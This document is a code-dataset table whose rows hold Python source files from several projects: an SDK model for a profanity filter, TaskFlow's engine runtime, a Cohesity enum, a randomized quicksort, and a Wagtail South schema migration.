hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
50cc25774ad7c70f901cc5d533d155db49ae90d8 | 4,590 | py | Python | accelbyte_py_sdk/api/lobby/models/models_profanity_filter.py | encyphered/accelbyte-python-sdk | 09c1e989d7251de308150fdcd3119d662ca2d205 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/lobby/models/models_profanity_filter.py | encyphered/accelbyte-python-sdk | 09c1e989d7251de308150fdcd3119d662ca2d205 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/lobby/models/models_profanity_filter.py | encyphered/accelbyte-python-sdk | 09c1e989d7251de308150fdcd3119d662ca2d205 | [
"MIT"
] | null | null | null | # Auto-generated at 2021-09-27T17:12:33.496089+08:00
# from: Justice Lobby Service (1.33.0)
# Copyright (c) 2018 - 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import Model
class ModelsProfanityFilter(Model):
    """Models profanity filter

    Properties:
        filter_: (filter) REQUIRED str
        list_name: (listName) REQUIRED str
        namespace: (namespace) REQUIRED str
        note: (note) REQUIRED str
    """

    # region fields

    filter_: str  # REQUIRED
    list_name: str  # REQUIRED
    namespace: str  # REQUIRED
    note: str  # REQUIRED

    # endregion fields

    # region with_x methods

    def with_filter(self, value: str) -> ModelsProfanityFilter:
        self.filter_ = value
        return self

    def with_list_name(self, value: str) -> ModelsProfanityFilter:
        self.list_name = value
        return self

    def with_namespace(self, value: str) -> ModelsProfanityFilter:
        self.namespace = value
        return self

    def with_note(self, value: str) -> ModelsProfanityFilter:
        self.note = value
        return self

    # endregion with_x methods

    # region to methods

    def to_dict(self, include_empty: bool = False) -> dict:
        """Serialize this model into a JSON-ready dict.

        Attributes that are set and truthy are emitted under their wire
        names; unset/falsy ones are emitted as empty strings only when
        ``include_empty`` is True.
        """
        result = {}
        # Drive the serialization off the wire-name -> attribute-name map
        # rather than one hand-written if/elif pair per field; the emitted
        # keys and values match the per-field form exactly.
        for json_name, attr_name in self.get_field_info().items():
            if hasattr(self, attr_name) and getattr(self, attr_name):
                result[json_name] = str(getattr(self, attr_name))
            elif include_empty:
                result[json_name] = str()
        return result

    # endregion to methods

    # region static methods

    @classmethod
    def create(
        cls,
        filter_: str,
        list_name: str,
        namespace: str,
        note: str,
    ) -> ModelsProfanityFilter:
        """Build an instance with every required field populated."""
        instance = cls()
        instance.filter_ = filter_
        instance.list_name = list_name
        instance.namespace = namespace
        instance.note = note
        return instance

    @classmethod
    def create_from_dict(cls, dict_: dict, include_empty: bool = False) -> ModelsProfanityFilter:
        """Build an instance from a JSON-style dict keyed by wire names."""
        instance = cls()
        if not dict_:
            return instance
        for json_name, attr_name in cls.get_field_info().items():
            if json_name in dict_ and dict_[json_name] is not None:
                setattr(instance, attr_name, str(dict_[json_name]))
            elif include_empty:
                setattr(instance, attr_name, str())
        return instance

    @staticmethod
    def get_field_info() -> Dict[str, str]:
        """Map JSON wire names to the corresponding attribute names."""
        return {
            "filter": "filter_",
            "listName": "list_name",
            "namespace": "namespace",
            "note": "note",
        }

    # endregion static methods
| 31.875 | 109 | 0.580392 |
32ce052a3bc7516bd159f910902f2c10a17cf901 | 13,858 | py | Python | taskflow/engines/action_engine/runtime.py | mail2nsrajesh/taskflow | 306087839cdb616f6fde94d8748acd01e64d1a3c | [
"Apache-2.0"
] | null | null | null | taskflow/engines/action_engine/runtime.py | mail2nsrajesh/taskflow | 306087839cdb616f6fde94d8748acd01e64d1a3c | [
"Apache-2.0"
] | 1 | 2018-10-19T18:58:38.000Z | 2018-10-19T18:58:38.000Z | taskflow/engines/action_engine/runtime.py | jimbobhickville/taskflow | 6ea991ce94f5be46b7e4726b4c4f014e10407786 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
from futurist import waiters
from taskflow import deciders as de
from taskflow.engines.action_engine.actions import retry as ra
from taskflow.engines.action_engine.actions import task as ta
from taskflow.engines.action_engine import builder as bu
from taskflow.engines.action_engine import compiler as com
from taskflow.engines.action_engine import completer as co
from taskflow.engines.action_engine import scheduler as sched
from taskflow.engines.action_engine import scopes as sc
from taskflow.engines.action_engine import selector as se
from taskflow.engines.action_engine import traversal as tr
from taskflow import exceptions as exc
from taskflow import logging
from taskflow import states as st
from taskflow.utils import misc
from taskflow.flow import (LINK_DECIDER, LINK_DECIDER_DEPTH) # noqa
# Small helper to make the edge decider tuples more easily useable...
# (from_node, kind, decider, depth) record: one decider attached to the edge
# leading from ``from_node`` into the atom whose execution is being decided.
_EdgeDecider = collections.namedtuple('_EdgeDecider',
                                      'from_node,kind,decider,depth')

# Module-level logger (named after this module).
LOG = logging.getLogger(__name__)
class Runtime(object):
    """An aggregate of runtime objects, properties, ... used during execution.

    This object contains various utility methods and properties that represent
    the collection of runtime components and functionality needed for an
    action engine to run to completion.
    """

    def __init__(self, compilation, storage, atom_notifier,
                 task_executor, retry_executor,
                 options=None):
        self._atom_notifier = atom_notifier
        self._task_executor = task_executor
        self._retry_executor = retry_executor
        self._storage = storage
        self._compilation = compilation
        # Populated lazily by compile(): atom name -> per-atom helper metadata.
        self._atom_cache = {}
        self._options = misc.safe_copy_dict(options)

    def _walk_edge_deciders(self, graph, atom):
        """Iterates through all nodes, deciders that alter atoms execution."""
        # This is basically a reverse breadth first exploration, with
        # special logic to further traverse down flow nodes as needed...
        # NOTE: relies on the networkx 1.x iterator API (predecessors_iter,
        # graph.node); a networkx 2.x graph would not provide these names.
        predecessors_iter = graph.predecessors_iter
        nodes = collections.deque((u_node, atom)
                                  for u_node in predecessors_iter(atom))
        visited = set()
        while nodes:
            u_node, v_node = nodes.popleft()
            u_node_kind = graph.node[u_node]['kind']
            u_v_data = graph.adj[u_node][v_node]
            try:
                decider = u_v_data[LINK_DECIDER]
                decider_depth = u_v_data.get(LINK_DECIDER_DEPTH)
                if decider_depth is None:
                    decider_depth = de.Depth.ALL
                yield _EdgeDecider(u_node, u_node_kind,
                                   decider, decider_depth)
            except KeyError:
                # No decider attached to this edge; nothing to yield.
                pass
            if u_node_kind == com.FLOW and u_node not in visited:
                # Avoid re-exploring the same flow if we get to this same
                # flow by a different *future* path...
                visited.add(u_node)
                # Since we *currently* jump over flow node(s), we need to make
                # sure that any prior decider that was directed at this flow
                # node also gets used during future decisions about this
                # atom node.
                nodes.extend((u_u_node, u_node)
                             for u_u_node in predecessors_iter(u_node))

    def compile(self):
        """Compiles & caches frequently used execution helper objects.

        Build out a cache of commonly used item that are associated
        with the contained atoms (by name), and are useful to have for
        quick lookup on (for example, the change state handler function for
        each atom, the scope walker object for each atom, the task or retry
        specific scheduler and so-on).
        """
        # Per-kind handler/scheduler/action lookup tables; flows are skipped
        # below, so only TASK and RETRY entries are needed.
        change_state_handlers = {
            com.TASK: functools.partial(self.task_action.change_state,
                                        progress=0.0),
            com.RETRY: self.retry_action.change_state,
        }
        schedulers = {
            com.RETRY: self.retry_scheduler,
            com.TASK: self.task_scheduler,
        }
        check_transition_handlers = {
            com.TASK: st.check_task_transition,
            com.RETRY: st.check_retry_transition,
        }
        actions = {
            com.TASK: self.task_action,
            com.RETRY: self.retry_action,
        }
        graph = self._compilation.execution_graph
        for node, node_data in graph.nodes_iter(data=True):
            node_kind = node_data['kind']
            if node_kind in com.FLOWS:
                continue
            elif node_kind in com.ATOMS:
                check_transition_handler = check_transition_handlers[node_kind]
                change_state_handler = change_state_handlers[node_kind]
                scheduler = schedulers[node_kind]
                action = actions[node_kind]
            else:
                raise exc.CompilationFailure("Unknown node kind '%s'"
                                             " encountered" % node_kind)
            metadata = {}
            deciders_it = self._walk_edge_deciders(graph, node)
            walker = sc.ScopeWalker(self.compilation, node, names_only=True)
            metadata['scope_walker'] = walker
            metadata['check_transition_handler'] = check_transition_handler
            metadata['change_state_handler'] = change_state_handler
            metadata['scheduler'] = scheduler
            metadata['edge_deciders'] = tuple(deciders_it)
            metadata['action'] = action
            LOG.trace("Compiled %s metadata for node %s (%s)",
                      metadata, node.name, node_kind)
            self._atom_cache[node.name] = metadata
        # TODO(harlowja): optimize the different decider depths to avoid
        # repeated full successor searching; this can be done by searching
        # for the widest depth of parent(s), and limiting the search of
        # children by the that depth.

    @property
    def compilation(self):
        """The compilation this runtime was created with."""
        return self._compilation

    @property
    def storage(self):
        """The storage backend this runtime was created with."""
        return self._storage

    @property
    def options(self):
        """Copied options dict provided at construction time."""
        return self._options

    @misc.cachedproperty
    def selector(self):
        return se.Selector(self)

    @misc.cachedproperty
    def builder(self):
        return bu.MachineBuilder(self, waiters.wait_for_any)

    @misc.cachedproperty
    def completer(self):
        return co.Completer(self)

    @misc.cachedproperty
    def scheduler(self):
        return sched.Scheduler(self)

    @misc.cachedproperty
    def task_scheduler(self):
        return sched.TaskScheduler(self)

    @misc.cachedproperty
    def retry_scheduler(self):
        return sched.RetryScheduler(self)

    @misc.cachedproperty
    def retry_action(self):
        return ra.RetryAction(self._storage,
                              self._atom_notifier,
                              self._retry_executor)

    @misc.cachedproperty
    def task_action(self):
        return ta.TaskAction(self._storage,
                             self._atom_notifier,
                             self._task_executor)

    def _fetch_atom_metadata_entry(self, atom_name, metadata_key):
        # Raises KeyError if the atom name was never compiled into the cache.
        return self._atom_cache[atom_name][metadata_key]

    def check_atom_transition(self, atom, current_state, target_state):
        """Checks if the atom can transition to the provided target state."""
        # This does not check if the name exists (since this is only used
        # internally to the engine, and is not exposed to atoms that will
        # not exist and therefore doesn't need to handle that case).
        check_transition_handler = self._fetch_atom_metadata_entry(
            atom.name, 'check_transition_handler')
        return check_transition_handler(current_state, target_state)

    def fetch_edge_deciders(self, atom):
        """Fetches the edge deciders for the given atom."""
        # This does not check if the name exists (since this is only used
        # internally to the engine, and is not exposed to atoms that will
        # not exist and therefore doesn't need to handle that case).
        return self._fetch_atom_metadata_entry(atom.name, 'edge_deciders')

    def fetch_scheduler(self, atom):
        """Fetches the cached specific scheduler for the given atom."""
        # This does not check if the name exists (since this is only used
        # internally to the engine, and is not exposed to atoms that will
        # not exist and therefore doesn't need to handle that case).
        return self._fetch_atom_metadata_entry(atom.name, 'scheduler')

    def fetch_action(self, atom):
        """Fetches the cached action handler for the given atom."""
        metadata = self._atom_cache[atom.name]
        return metadata['action']

    def fetch_scopes_for(self, atom_name):
        """Fetches a walker of the visible scopes for the given atom."""
        try:
            return self._fetch_atom_metadata_entry(atom_name, 'scope_walker')
        except KeyError:
            # This signals to the caller that there is no walker for whatever
            # atom name was given that doesn't really have any associated atom
            # known to be named with that name; this is done since the storage
            # layer will call into this layer to fetch a scope for a named
            # atom and users can provide random names that do not actually
            # exist...
            return None

    # Various helper methods used by the runtime components; not for public
    # consumption...

    def iterate_retries(self, state=None):
        """Iterates retry atoms that match the provided state.

        If no state is provided it will yield back all retry atoms.
        """
        if state:
            atoms = list(self.iterate_nodes((com.RETRY,)))
            # Fetch all states in one storage call rather than one per atom.
            atom_states = self._storage.get_atoms_states(atom.name
                                                         for atom in atoms)
            for atom in atoms:
                atom_state, _atom_intention = atom_states[atom.name]
                if atom_state == state:
                    yield atom
        else:
            for atom in self.iterate_nodes((com.RETRY,)):
                yield atom

    def iterate_nodes(self, allowed_kinds):
        """Yields back all nodes of specified kinds in the execution graph."""
        graph = self._compilation.execution_graph
        for node, node_data in graph.nodes_iter(data=True):
            if node_data['kind'] in allowed_kinds:
                yield node

    def is_success(self):
        """Checks if all atoms in the execution graph are in 'happy' state."""
        atoms = list(self.iterate_nodes(com.ATOMS))
        atom_states = self._storage.get_atoms_states(atom.name
                                                     for atom in atoms)
        for atom in atoms:
            atom_state, _atom_intention = atom_states[atom.name]
            if atom_state == st.IGNORE:
                # Ignored atoms do not count against success.
                continue
            if atom_state != st.SUCCESS:
                return False
        return True

    def find_retry(self, node):
        """Returns the retry atom associated to the given node (or none)."""
        graph = self._compilation.execution_graph
        return graph.node[node].get(com.RETRY)

    def reset_atoms(self, atoms, state=st.PENDING, intention=st.EXECUTE):
        """Resets all the provided atoms to the given state and intention.

        Returns a list of (atom, state, intention) tuples for the atoms
        that were actually tweaked.  Passing a falsy state or intention
        skips that particular reset.
        """
        tweaked = []
        for atom in atoms:
            if state or intention:
                tweaked.append((atom, state, intention))
            if state:
                change_state_handler = self._fetch_atom_metadata_entry(
                    atom.name, 'change_state_handler')
                change_state_handler(atom, state)
            if intention:
                self.storage.set_atom_intention(atom.name, intention)
        return tweaked

    def reset_all(self, state=st.PENDING, intention=st.EXECUTE):
        """Resets all atoms to the given state and intention."""
        return self.reset_atoms(self.iterate_nodes(com.ATOMS),
                                state=state, intention=intention)

    def reset_subgraph(self, atom, state=st.PENDING, intention=st.EXECUTE):
        """Resets a atoms subgraph to the given state and intention.

        The subgraph is contained of **all** of the atoms successors.
        """
        execution_graph = self._compilation.execution_graph
        atoms_it = tr.depth_first_iterate(execution_graph, atom,
                                          tr.Direction.FORWARD)
        return self.reset_atoms(atoms_it, state=state, intention=intention)

    def retry_subflow(self, retry):
        """Prepares a retrys + its subgraph for execution.

        This sets the retrys intention to ``EXECUTE`` and resets all of its
        subgraph (its successors) to the ``PENDING`` state with an ``EXECUTE``
        intention.
        """
        tweaked = self.reset_atoms([retry], state=None, intention=st.EXECUTE)
        tweaked.extend(self.reset_subgraph(retry))
        return tweaked
| 42.121581 | 79 | 0.634002 |
0cc31fd65e25fb78c6cd247c545d6a4cf3178582 | 782 | py | Python | cohesity_management_sdk/models/object_class_added_active_directory_principal_enum.py | chandrashekar-cohesity/management-sdk-python | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | [
"Apache-2.0"
] | 1 | 2019-11-07T23:19:32.000Z | 2019-11-07T23:19:32.000Z | cohesity_management_sdk/models/object_class_added_active_directory_principal_enum.py | chandrashekar-cohesity/management-sdk-python | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | [
"Apache-2.0"
] | null | null | null | cohesity_management_sdk/models/object_class_added_active_directory_principal_enum.py | chandrashekar-cohesity/management-sdk-python | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
class ObjectClassAddedActiveDirectoryPrincipalEnum(object):
    """Implementation of the 'ObjectClass_AddedActiveDirectoryPrincipal' enum.

    Specifies the type of the referenced Active Directory principal.
    If 'kGroup', the referenced Active Directory principal is a group.
    If 'kUser', the referenced Active Directory principal is a user.
    'kUser' specifies a user object class.
    'kGroup' specifies a group object class.
    'kComputer' specifies a computer object class.

    Attributes:
        KUSER: Wire value 'kUser' for the user object class.
        KGROUP: Wire value 'kGroup' for the group object class.
        KCOMPUTER: Wire value 'kComputer' for the computer object class.

    """

    # NOTE: these are plain string constants (not enum.Enum members); callers
    # compare/serialize them as strings, so the values must stay unchanged.
    KUSER = 'kUser'

    KGROUP = 'kGroup'

    KCOMPUTER = 'kComputer'
| 27.928571 | 78 | 0.704604 |
bd1aed3e21a7354d1e6d0e20be5c345e504e2636 | 638 | py | Python | 01-algorithm-design-and-techniques/4_divide_and_conquer/sorting.py | hamidgasmi/training.computerscience.algorithms-datastructures | bd156dd2e9ed5681d9f1e4a23f71a92d68d0db43 | [
"MIT"
] | 8 | 2020-11-15T13:55:27.000Z | 2022-03-15T00:30:10.000Z | 01-algorithm-design-and-techniques/4_divide_and_conquer/sorting.py | hamidgasmi/training.computerscience.algorithms-datastructures | bd156dd2e9ed5681d9f1e4a23f71a92d68d0db43 | [
"MIT"
] | 217 | 2020-02-28T03:09:05.000Z | 2020-10-29T13:19:12.000Z | 01-algorithm-design-and-techniques/4_divide_and_conquer/sorting.py | hamidgasmi/training.computerscience.algorithms-datastructures | bd156dd2e9ed5681d9f1e4a23f71a92d68d0db43 | [
"MIT"
] | 3 | 2021-07-04T06:42:14.000Z | 2021-11-20T17:56:48.000Z | import sys
import random
def partition2(a, l, r):
    """Lomuto partition of a[l..r] (inclusive) around the pivot a[l], in place.

    Rearranges the slice so that every element <= pivot ends up left of the
    pivot's final slot, and returns that final pivot index.
    """
    pivot = a[l]
    boundary = l  # last index of the "<= pivot" region
    for scan in range(l + 1, r + 1):
        if a[scan] <= pivot:
            boundary += 1
            a[scan], a[boundary] = a[boundary], a[scan]
    # Drop the pivot between the two regions.
    a[l], a[boundary] = a[boundary], a[l]
    return boundary
def randomized_quick_sort(a, l, r):
    """Sort a[l..r] (inclusive) in place using quicksort with a random pivot.

    Iterative variant: pending (lo, hi) ranges live on an explicit stack
    instead of the call stack; each range is handled exactly as the
    recursive formulation would handle it.
    """
    pending = [(l, r)]
    while pending:
        lo, hi = pending.pop()
        if lo >= hi:
            continue  # zero- or one-element range: already sorted
        # Swap a randomly chosen pivot into the leading slot, then partition.
        k = random.randint(lo, hi)
        a[lo], a[k] = a[k], a[lo]
        m = partition2(a, lo, hi)
        pending.append((lo, m - 1))
        pending.append((m + 1, hi))
if __name__ == '__main__':
    # Input format: a count n followed by n integers, whitespace-separated.
    # Sort the n values in place and echo them back space-separated
    # (each value followed by a single space, exactly as read order demands).
    raw_text = sys.stdin.read()  # avoid shadowing the builtin ``input``
    n, *values = list(map(int, raw_text.split()))
    randomized_quick_sort(values, 0, n - 1)
    for value in values:
        print(value, end=' ')
| 20.580645 | 41 | 0.485893 |
31af299fc92936ff339b680f2b2c07c1715f53a5 | 11,147 | py | Python | wagtail/wagtailcore/south_migrations/0001_initial.py | willcodefortea/wagtail | 2723b85ed8f356bde89d9541105b8cea4812d6a1 | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/south_migrations/0001_initial.py | willcodefortea/wagtail | 2723b85ed8f356bde89d9541105b8cea4812d6a1 | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/south_migrations/0001_initial.py | willcodefortea/wagtail | 2723b85ed8f356bde89d9541105b8cea4812d6a1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from wagtail.wagtailcore.compat import AUTH_USER_MODEL, AUTH_USER_MODEL_NAME
class Migration(SchemaMigration):
    """Initial South schema migration for wagtailcore.

    ``forwards`` creates the Site, Page, PageRevision and
    GroupPagePermission tables; ``backwards`` drops them.  User references
    go through AUTH_USER_MODEL / AUTH_USER_MODEL_NAME (imported above) so
    a swapped-out user model is reflected in the frozen ORM.
    """

    def forwards(self, orm):
        # Adding model 'Site'
        db.create_table('wagtailcore_site', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('hostname', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255, db_index=True)),
            ('port', self.gf('django.db.models.fields.IntegerField')(default=80)),
            ('root_page', self.gf('django.db.models.fields.related.ForeignKey')(related_name='sites_rooted_here', to=orm['wagtailcore.Page'])),
            ('is_default_site', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ))
        db.send_create_signal('wagtailcore', ['Site'])

        # Adding model 'Page'
        # (path/depth/numchild are the materialized-path tree columns.)
        db.create_table('wagtailcore_page', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('path', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
            ('depth', self.gf('django.db.models.fields.PositiveIntegerField')()),
            ('numchild', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
            ('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('slug', self.gf('django.db.models.fields.SlugField')(max_length=50)),
            ('content_type', self.gf('django.db.models.fields.related.ForeignKey')(related_name='pages', to=orm['contenttypes.ContentType'])),
            ('live', self.gf('django.db.models.fields.BooleanField')(default=True)),
            ('has_unpublished_changes', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('url_path', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
            ('owner', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='owned_pages', null=True, to=orm[AUTH_USER_MODEL])),
            ('seo_title', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
            ('show_in_menus', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('search_description', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal('wagtailcore', ['Page'])

        # Adding model 'PageRevision'
        db.create_table('wagtailcore_pagerevision', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('page', self.gf('django.db.models.fields.related.ForeignKey')(related_name='revisions', to=orm['wagtailcore.Page'])),
            ('submitted_for_moderation', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('created_at', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm[AUTH_USER_MODEL], null=True, blank=True)),
            ('content_json', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal('wagtailcore', ['PageRevision'])

        # Adding model 'GroupPagePermission'
        db.create_table('wagtailcore_grouppagepermission', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('group', self.gf('django.db.models.fields.related.ForeignKey')(related_name='page_permissions', to=orm['auth.Group'])),
            ('page', self.gf('django.db.models.fields.related.ForeignKey')(related_name='group_permissions', to=orm['wagtailcore.Page'])),
            ('permission_type', self.gf('django.db.models.fields.CharField')(max_length=20)),
        ))
        db.send_create_signal('wagtailcore', ['GroupPagePermission'])

    def backwards(self, orm):
        # Drop the four tables in reverse of any FK-sensitive order.
        # Deleting model 'Site'
        db.delete_table('wagtailcore_site')

        # Deleting model 'Page'
        db.delete_table('wagtailcore_page')

        # Deleting model 'PageRevision'
        db.delete_table('wagtailcore_pagerevision')

        # Deleting model 'GroupPagePermission'
        db.delete_table('wagtailcore_grouppagepermission')

    # Frozen ORM snapshot used by South when running this migration.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        AUTH_USER_MODEL: {
            'Meta': {'object_name': AUTH_USER_MODEL_NAME},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Group']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Permission']"}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'wagtailcore.grouppagepermission': {
            'Meta': {'object_name': 'GroupPagePermission'},
            'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'page_permissions'", 'to': "orm['auth.Group']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'group_permissions'", 'to': "orm['wagtailcore.Page']"}),
            'permission_type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
        },
        'wagtailcore.page': {
            'Meta': {'object_name': 'Page'},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pages'", 'to': "orm['contenttypes.ContentType']"}),
            'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'has_unpublished_changes': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'live': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'owned_pages'", 'null': 'True', 'to': "orm['%s']" % AUTH_USER_MODEL}),
            'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'search_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'seo_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'show_in_menus': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'url_path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
        },
        'wagtailcore.pagerevision': {
            'Meta': {'object_name': 'PageRevision'},
            'content_json': ('django.db.models.fields.TextField', [], {}),
            'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['wagtailcore.Page']"}),
            'submitted_for_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % AUTH_USER_MODEL, 'null': 'True', 'blank': 'True'})
        },
        'wagtailcore.site': {
            'Meta': {'object_name': 'Site'},
            'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_default_site': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'port': ('django.db.models.fields.IntegerField', [], {'default': '80'}),
            'root_page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sites_rooted_here'", 'to': "orm['wagtailcore.Page']"})
        }
    }
complete_apps = ['wagtailcore'] | 70.106918 | 193 | 0.60366 |
